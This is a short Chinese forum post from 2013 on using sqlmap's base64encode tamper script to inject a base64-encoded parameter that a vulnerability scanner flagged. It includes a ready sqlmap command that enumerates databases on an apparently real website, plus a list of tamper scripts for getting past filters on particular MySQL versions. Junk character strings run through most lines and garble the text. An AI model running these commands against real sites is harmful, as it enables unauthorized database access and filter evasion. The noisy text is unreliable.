找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2317|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?% W( Q/ M  L/ R. B3 g5 \
1 m$ f( p* p9 F+ ~" Q  x1 u) ]3 j
sqlmap的tamper里有个base64encode.py
, |  k' \5 N, j3 j2 p& e% @9 e
) S! y4 E7 z0 o$ S# Y+ t0 p使用如下
* Y7 f4 O7 R3 d; q, }, D: x
6 {" R; F6 a+ j. lsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
; ]* B5 N  f" M4 E; b" X
7 M' B5 y* |! q( T: l  l" a7 M9 A+ k, J
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
9 m. v) j4 _1 F% Y! v/ J  n
$ h- c; V% s( t; t8 r0 ?( W) v% m其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
7 T3 U9 k3 C9 X" l6 j) t
( S8 t* N* V1 |space2hash.py ,对于MYSQL数据库 4.0, 5.0注入9 y; j9 B) p3 |0 U! a% `, U$ i
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入" m8 |4 [6 ~: J! ~: W' L" P" A
首先确定目标数据库版本,然后选择相应的脚本。( [* r2 E; B* W. ]
-v 3 --batch --tamper "space2hash.py"% k$ ]$ Q6 \# \) \. O6 p
' `4 a6 ~6 d0 @- ]. x2 C+ {
还有其他一些插件:1 o, ?' K# }2 S
encodes编码 ——charencode.py$ S" W$ l; k4 Y' Z
base64编码 —— base64encode.py
# g, ^( R6 w3 ?* G) ?替换空格和关键字 —— halfversionedmorekeywords.py
/ C& ]1 ?+ W- [3 j
0 t# \' J8 |/ @% \/ F" N1 o/ }0 [( I

! N8 N6 S) K9 h  x8 [! |
/ E6 w- B" Q. G+ T2 L  R* K, I
& p6 G) N- m0 q; w& E5 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表